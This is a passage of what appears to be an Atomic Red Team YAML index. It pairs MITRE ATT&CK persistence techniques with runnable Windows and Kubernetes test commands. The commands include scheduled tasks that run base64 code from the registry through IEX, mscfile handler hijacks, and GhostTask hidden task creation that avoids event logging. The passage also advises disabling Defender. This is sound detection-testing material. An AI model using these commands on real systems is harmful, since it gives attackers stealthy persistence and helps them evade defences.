- name: WMI Invoke-CimMethod Scheduled Task
auto_generated_guid: e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b
description: 'Create an scheduled task that executes notepad.exe after user
login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing
as Register-ScheduledTask cmdlet behind the scenes.
'
supported_platforms:
- windows
input_arguments:
xml_path:
description: path of vbs to use when creating masquerading files
type: path
default: PathToAtomicsFolder\T1053.005\src\T1053_005_WMI.xml
dependency_executor_name: powershell
dependencies:
- description: 'File to copy must exist on disk at specified location (#{xml_path})
'
prereq_command: 'if (Test-Path "#{xml_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{xml_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_005_WMI.xml" -OutFile "#{xml_path}"
executor:
name: powershell
elevation_required: true
command: |
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false
>$null 2>&1
'
- name: Scheduled Task Executing Base64 Encoded Commands From Registry
auto_generated_guid: e895677d-4f06-49ab-91b6-ae3742d0a2ba
description: "A Base64 Encoded command will be stored in the registry (ping
127.0.0.1) and then a scheduled task will be created.\nThe scheduled task
will launch powershell to decode and run the command in the registry daily.\nThis
is a persistence mechanism recently seen in use by Qakbot. \n\n[Additiona
Information](https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/)\n"
supported_platforms:
- windows
input_arguments:
time:
description: Daily scheduled task execution time
type: string
default: '07:45'
executor:
command: |
reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
cleanup_command: |
schtasks /delete /tn "ATOMIC-T1053.005" /F >nul 2>&1
reg delete HKCU\SOFTWARE\ATOMIC-T1053.005 /F >nul 2>&1
name: command_prompt
- name: Import XML Schedule Task with Hidden Attribute
auto_generated_guid: cd925593-fbb4-486d-8def-16cbdf944bf4
description: "Create an scheduled task that executes calc.exe after user login
from XML that contains hidden setting attribute. \nThis technique was seen
several times in tricbot malware and also with the targetted attack campaigne
the industroyer2.\n"
supported_platforms:
- windows
input_arguments:
xml_path:
description: path of vbs to use when creating masquerading files
type: path
default: PathToAtomicsFolder\T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml
dependency_executor_name: powershell
dependencies:
- description: 'File to copy must exist on disk at specified location (#{xml_path})
'
prereq_command: 'if (Test-Path "#{xml_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{xml_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_05_SCTASK_HIDDEN_ATTRIB.xml" -OutFile "#{xml_path}"
executor:
name: powershell
elevation_required: true
command: |
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
cleanup_command: 'Unregister-ScheduledTask -TaskName "atomic red team" -confirm:$false
>$null 2>&1
'
- name: PowerShell Modify A Scheduled Task
auto_generated_guid: dda6fc7b-c9a6-4c18-b98d-95ec6542af6d
description: "Create a scheduled task with an action and modify the action to
do something else. The initial idea is to showcase Microsoft Windows TaskScheduler
Operational log modification of an action on a Task already registered. \nIt
will first be created to spawn cmd.exe, but modified to run notepad.exe.\n\nUpon
successful execution, powershell.exe will create a scheduled task and modify
the action. \n"
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: |
$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTaskModifed" -confirm:$false
>$null 2>&1
'
- name: Scheduled Task ("Ghost Task") via Registry Key Manipulation
auto_generated_guid: 704333ca-cc12-4bcf-9916-101844881f54
description: |
Create a scheduled task through manipulation of registry keys. This procedure is implemented using the [GhostTask](https://github.com/netero1010/GhostTask) utility. By manipulating registry keys under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree, the tool creates user-specified scheduled tasks without a corresponding Windows Event 4698, which is logged when scheduled tasks are created through conventional means.
This requires a download of the GhostTask binary, which must be run as NT Authority\SYSTEM. Upon successful execution of this test, a scheduled task will be set to run at logon which launches notepad.exe or runs a user-specified command.
For further exploration of this procedure and guidance for hunting and detection, see [Hunting G-G-G-GhostTasks!](https://medium.com/p/154b50ab6a78).
supported_platforms:
- windows
input_arguments:
task_name:
description: Name of the newly-added task
type: string
default: lilghostie
task_command:
description: Command you want the task to execute
type: string
default: notepad.exe
target:
description: System where the task should run
type: string
default: localhost
user_name:
description: Username to authenticate with, such as ATOMICDOMAIN\AtomicAdmin
type: string
default: "$env:USERDOMAIN + '\\' + $env:USERNAME"
dependency_executor_name: powershell
dependencies:
- description: 'PsExec tool from Sysinternals must exist in the ExternalPayloads
directory
'
prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe")
{ exit 0} else { exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" "PathToAtomicsFolder\..\ExternalPayloads\PsTools" -Force
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe" "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -Force
- description: 'GhostTask.exe tool from netero101 must exist in the ExternalPayloads
directory. This tool may be quarantined by windows defender; disable windows
defender real-time protection to fix it or add the ExternalPayloads directory
as an exclusion, using a command like `Add-MpPreference -ExclusionPath "PathToAtomicsFolder\..\ExternalPayloads\"`
'
prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe")
{ exit 0} else { exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/netero1010/GhostTask/releases/download/1.0/GhostTask.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe"
executor:
name: command_prompt
elevation_required: true
command: |
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
cleanup_command: |
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} delete #{task_name} > nul
- name: Scheduled Task Persistence via CompMgmt.msc
auto_generated_guid: 8fcfa3d5-ea7d-4e1c-bd3e-3c4ed315b7d2
description: "Adds persistence by abusing `compmgmt.msc` via a scheduled task.\nWhen
the Computer Management console is opened, it will run a malicious payload
(in this case, `calc.exe`). \nThis technique abuses scheduled tasks and registry
modifications to hijack legitimate system processes.\n"
supported_platforms:
- windows
input_arguments:
task_name:
description: Name of the newly-created scheduled task
type: string
default: CompMgmtBypass
payload:
description: Command you want the task to execute
type: string
default: calc.exe
executor:
name: command_prompt
elevation_required: true
command: |
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc
cleanup_command: |
reg delete "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /f
schtasks /Delete /TN "#{task_name}" /F
- name: Scheduled Task Persistence via Eventviewer.msc
auto_generated_guid: 02124c37-767e-4b76-9383-c9fc366d9d4c
description: "Adds persistence by abusing `eventviewer.msc` via a scheduled
task.\nWhen the eventviewer console is opened, it will run a malicious payload
(in this case, `calc.exe`). \n"
supported_platforms:
- windows
input_arguments:
task_name:
description: Name of the newly-created scheduled task
type: string
default: EventViewerBypass
payload:
description: Command you want the task to execute
type: string
default: calc.exe
executor:
name: command_prompt
elevation_required: true
command: |
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"
cleanup_command: |
reg delete "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /f
schtasks /Delete /TN "#{task_name}" /F
T1037:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334
created: '2017-05-31T21:30:38.910Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1037
external_id: T1037
- source_name: Anomali Rocke March 2019
description: Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With
a New Malware Family Written in Golang. Retrieved April 24, 2019.
url: https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang
- source_name: Mandiant APT29 Eye Spy Email Nov 22
description: 'Mandiant. (2022, May 2). UNC3524: Eye Spy on Your Email. Retrieved
August 17, 2023.'
url: https://www.mandiant.com/resources/blog/unc3524-eye-spy-email
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:20.077Z'
name: Boot or Logon Initialization Scripts
description: "Adversaries may use scripts automatically executed at boot or
logon initialization to establish persistence.(Citation: Mandiant APT29 Eye
Spy Email Nov 22)(Citation: Anomali Rocke March 2019) Initialization scripts
can be used to perform administrative functions, which may often execute other
programs or send information to an internal logging server. These scripts
can vary based on operating system and whether applied locally or remotely.
\ \n\nAdversaries may use these scripts to maintain persistence on a single
system. Depending on the access configuration of the logon scripts, either
local credentials or an administrator account may be necessary. \n\nAn adversary
may also be able to escalate their privileges since some boot or logon initialization
scripts run with higher privileges."
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- macOS
- Windows
- Linux
- Network Devices
- ESXi
x_mitre_version: '2.4'
atomic_tests: []
T1574.007:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32
created: '2020-03-13T14:10:43.424Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/007
external_id: T1574.007
- source_name: Elastic Rules macOS launchctl 2022
description: Elastic Security 7.17. (2022, February 1). Modification of Environment
Variable via Launchctl. Retrieved September 28, 2023.
url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-4-modification-of-environment-variable-via-launchctl.html
- source_name: ExpressVPN PATH env Windows 2021
description: 'ExpressVPN Security Team. (2021, November 16). Cybersecurity
lessons: A PATH vulnerability in Windows. Retrieved September 28, 2023.'
url: https://www.expressvpn.com/blog/cybersecurity-lessons-a-path-vulnerability-in-windows/
- source_name: uptycs Fake POC linux malware 2023
description: 'Nischay Hegde and Siddartha Malladi. (2023, July 12). PoC Exploit:
Fake Proof of Concept with Backdoor Malware. Retrieved September 28, 2023.'
url: https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware
- source_name: nixCraft macOS PATH variables
description: Vivek Gite. (2023, August 22). MacOS – Set / Change $PATH Variable
Command. Retrieved September 28, 2023.
url: https://www.cyberciti.biz/faq/appleosx-bash-unix-change-set-path-environment-variable/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:22.736Z'
name: Path Interception by PATH Environment Variable
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables used to load libraries. The PATH environment variable
contains a list of directories (User and System) that the OS searches sequentially
through in search of the binary that was called from a script or the command
line. \n\nAdversaries can place a malicious program in an earlier entry in
the list of directories stored in the PATH environment variable, resulting
in the operating system executing the malicious binary rather than the legitimate
binary when it searches sequentially through that PATH listing.\n\nFor example,
on Windows if an adversary places a malicious program named \"net.exe\" in
`C:\\example path`, which by default precedes `C:\\Windows\\system32\\net.exe`
in the PATH environment variable, when \"net\" is executed from the command-line
the `C:\\example path` will be called instead of the system's legitimate executable
at `C:\\Windows\\system32\\net.exe`. Some methods of executing a program rely
on the PATH environment variable to determine the locations that are searched
when the path for the program is not given, such as executing programs from
a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation:
ExpressVPN PATH env Windows 2021)\n\nAdversaries may also directly modify
the $PATH variable specifying the directories to be searched. An adversary
can modify the `$PATH` variable to point to a directory they have write access.
When a program using the $PATH variable is called, the OS searches the specified
directory and executes the malicious binary. On macOS, this can also be performed
through modifying the $HOME variable. These variables can be modified using
the command-line, launchctl, [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004),
or modifying the `/etc/paths.d` folder contents.(Citation: uptycs Fake POC
linux malware 2023)(Citation: nixCraft macOS PATH variables)(Citation: Elastic
Rules macOS launchctl 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Stefan Kanthak
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- macOS
- Linux
x_mitre_version: '1.2'
atomic_tests: []
T1546.013:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3
created: '2020-01-24T15:11:02.758Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1546/013
external_id: T1546.013
- source_name: Wits End and Shady PowerShell Profiles
description: 'DeRyke, A.. (2019, June 7). Lab Notes: Persistence and Privilege
Elevation using the Powershell Profile. Retrieved July 8, 2019.'
url: https://witsendandshady.blogspot.com/2019/06/lab-notes-persistence-and-privilege.html
- source_name: ESET Turla PowerShell May 2019
description: Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell
usage. Retrieved June 14, 2019.
url: https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/
- source_name: Malware Archaeology PowerShell Cheat Sheet
description: Malware Archaeology. (2016, June). WINDOWS POWERSHELL LOGGING
CHEAT SHEET - Win 7/Win 2008 or later. Retrieved June 24, 2016.
url: http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf
- source_name: Microsoft About Profiles
description: Microsoft. (2017, November 29). About Profiles. Retrieved June
14, 2019.
url: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-6
- source_name: Microsoft Profiles
description: Microsoft. (2021, September 27). about_Profiles. Retrieved February
4, 2022.
url: https://docs.microsoft.com/powershell/module/microsoft.powershell.core/about/about_profiles
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:24.124Z'
name: 'Event Triggered Execution: PowerShell Profile'
description: "Adversaries may gain persistence and elevate privileges by executing
malicious content triggered by PowerShell profiles. A PowerShell profile (profile.ps1)
is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001)
starts and can be used as a logon script to customize user environments.\n\n[PowerShell](https://attack.mitre.org/techniques/T1059/001)
supports several profiles depending on the user or host program. For example,
there can be different profiles for [PowerShell](https://attack.mitre.org/techniques/T1059/001)
host programs such as the PowerShell console, PowerShell ISE or Visual Studio
Code. An administrator can also configure a profile that applies to all users
and host programs on the local computer. (Citation: Microsoft About Profiles)
\n\nAdversaries may modify these profiles to include arbitrary commands, functions,
modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001)
drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001)
session the modified script will be executed unless the -NoProfile
flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019)
\n\nAn adversary may also be able to escalate privileges if a script in a
PowerShell profile is loaded and executed by an account with higher privileges,
such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Allen DeRyke, ICE
- Matt Green, @mgreen27
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
identifier: T1546.013
atomic_tests:
- name: Append malicious start-process cmdlet
auto_generated_guid: '090e5aa5-32b6-473b-a49b-21e843a56896'
description: 'Appends a start process cmdlet to the current user''s powershell
profile pofile that points to a malicious executable. Upon execution, calc.exe
will be launched.
'
supported_platforms:
- windows
input_arguments:
exe_path:
description: Path the malicious executable
type: path
default: calc.exe
ps_profile:
description: Powershell profile to use
type: string
default: "$profile"
dependency_executor_name: powershell
dependencies:
- description: 'Ensure a powershell profile exists for the current user
'
prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1}
'
get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force
'
executor:
command: |
Add-Content #{ps_profile} -Value ""
Add-Content #{ps_profile} -Value "Start-Process #{exe_path}"
powershell -Command exit
cleanup_command: |
$oldprofile = cat $profile | Select-Object -skiplast 1
Set-Content $profile -Value $oldprofile
name: powershell
T1543:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5
created: '2020-01-10T16:03:18.865Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1543
external_id: T1543
- source_name: AppleDocs Launch Agent Daemons
description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved
July 10, 2017.
url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html
- source_name: TechNet Services
description: Microsoft. (n.d.). Services. Retrieved June 7, 2016.
url: https://technet.microsoft.com/en-us/library/cc772408.aspx
- source_name: OSX Malware Detection
description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical
OS X Malware Detection & Analysis. Retrieved November 17, 2024.'
url: https://papers.put.as/papers/macosx/2016/RSA_OSX_Malware.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:24.896Z'
name: Create or Modify System Process
description: "Adversaries may create or modify system-level processes to repeatedly
execute malicious payloads as part of persistence. When operating systems
boot up, they can start processes that perform background system functions.
On Windows and Linux, these system processes are referred to as services.(Citation:
TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run
to finish system initialization and load user specific parameters.(Citation:
AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services,
daemons, or agents that can be configured to execute at startup or a repeatable
interval in order to establish persistence. Similarly, adversaries may modify
existing services, daemons, or agents to achieve the same effect. \n\nServices,
daemons, or agents may be created with administrator privileges but executed
under root/SYSTEM privileges. Adversaries may leverage this functionality
to create or modify system processes in order to escalate privileges.(Citation:
OSX Malware Detection) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- macOS
- Linux
- Containers
x_mitre_version: '1.2'
atomic_tests: []
T1546.006:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--10ff21b9-5a01-4268-a1b5-3b55015f1847
created: '2020-01-24T14:21:52.750Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1546/006
external_id: T1546.006
- source_name: Malware Persistence on OS X
description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite.
Retrieved July 10, 2017.
url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: Writing Bad Malware for OSX
description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved
July 10, 2017.
url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.182Z'
name: LC_LOAD_DYLIB Addition
description: |-
Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- macOS
x_mitre_version: '1.1'
atomic_tests: []
T1053.007:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--1126cab1-c700-412f-a510-61f4937bb096
created: '2021-03-29T17:06:22.247Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1053/007
external_id: T1053.007
- source_name: Kubernetes CronJob
description: The Kubernetes Authors. (n.d.). Kubernetes CronJob. Retrieved
March 29, 2021.
url: https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/
- source_name: Kubernetes Jobs
description: The Kubernetes Authors. (n.d.). Kubernetes Jobs. Retrieved March
30, 2021.
url: https://kubernetes.io/docs/concepts/workloads/controllers/job/
- source_name: Threat Matrix for Kubernetes
description: Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved
March 30, 2021.
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.363Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
In Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in various nodes within a cluster.(Citation: Threat Matrix for Kubernetes)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Center for Threat-Informed Defense (CTID)
- Vishwas Manral, McAfee
- Yossi Weizman, Azure Defender Research Team
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Containers
x_mitre_version: '1.4'
identifier: T1053.007
atomic_tests:
- name: ListCronjobs
auto_generated_guid: ddfb0bc1-3c3f-47e9-a298-550ecfefacbd
description: 'Kubernetes Job is a controller that creates one or more pods and
ensures that a specified number of them successfully terminate. Kubernetes
Job can be used to run containers that perform finite tasks for batch jobs.
Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes
CronJob for scheduling execution of malicious code that would run as a container
in the cluster.
'
supported_platforms:
- containers
input_arguments:
namespace:
description: K8s namespace to list
type: string
default: default
dependencies:
- description: 'kubectl must be installed
'
get_prereq_command: 'echo "kubectl must be installed manually"
'
prereq_command: 'which kubectl
'
executor:
command: 'kubectl get cronjobs -n #{namespace}
'
name: bash
elevation_required: false
- name: CreateCronjob
auto_generated_guid: f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3
description: 'Kubernetes Job is a controller that creates one or more pods and
ensures that a specified number of them successfully terminate. Kubernetes
Job can be used to run containers that perform finite tasks for batch jobs.
Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes
CronJob for scheduling execution of malicious code that would run as a container
in the cluster.
'
supported_platforms:
- containers
input_arguments:
namespace:
description: K8s namespace to list
type: string
default: default
dependencies:
- description: 'kubectl must be installed
'
get_prereq_command: 'echo "kubectl must be installed manually"
'
prereq_command: 'which kubectl
'
executor:
command: 'kubectl create -f src/cronjob.yaml -n #{namespace}
'
cleanup_command: 'kubectl delete cronjob art -n #{namespace}
'
name: bash
elevation_required: false
T1548.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073
created: '2020-01-30T14:24:34.977Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1548/002
external_id: T1548.002
- source_name: Davidson Windows
description: Davidson, L. (n.d.). Windows 7 UAC whitelist. Retrieved November
12, 2014.
url: http://www.pretentiousname.com/misc/win7_uac_whitelist2.html
- source_name: TechNet How UAC Works
description: Lich, B. (2016, May 31). How User Account Control Works. Retrieved
June 3, 2016.
url: https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works
- source_name: SANS UAC Bypass
description: Medin, T. (2013, August 8). PsExec UAC Bypass. Retrieved June
3, 2016.
url: http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass
- source_name: MSDN COM Elevation
description: Microsoft. (n.d.). The COM Elevation Moniker. Retrieved July
26, 2016.
url: https://msdn.microsoft.com/en-us/library/ms679687.aspx
- source_name: enigma0x3 Fileless UAC Bypass
description: Nelson, M. (2016, August 15). "Fileless" UAC Bypass using eventvwr.exe
and Registry Hijacking. Retrieved December 27, 2016.
url: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
- source_name: enigma0x3 sdclt app paths
description: Nelson, M. (2017, March 14). Bypassing UAC using App Paths. Retrieved
May 25, 2017.
url: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
- source_name: enigma0x3 sdclt bypass
description: Nelson, M. (2017, March 17). "Fileless" UAC Bypass Using sdclt.exe.
Retrieved May 25, 2017.
url: https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/
- source_name: TechNet Inside UAC
description: 'Russinovich, M. (2009, July). User Account Control: Inside Windows
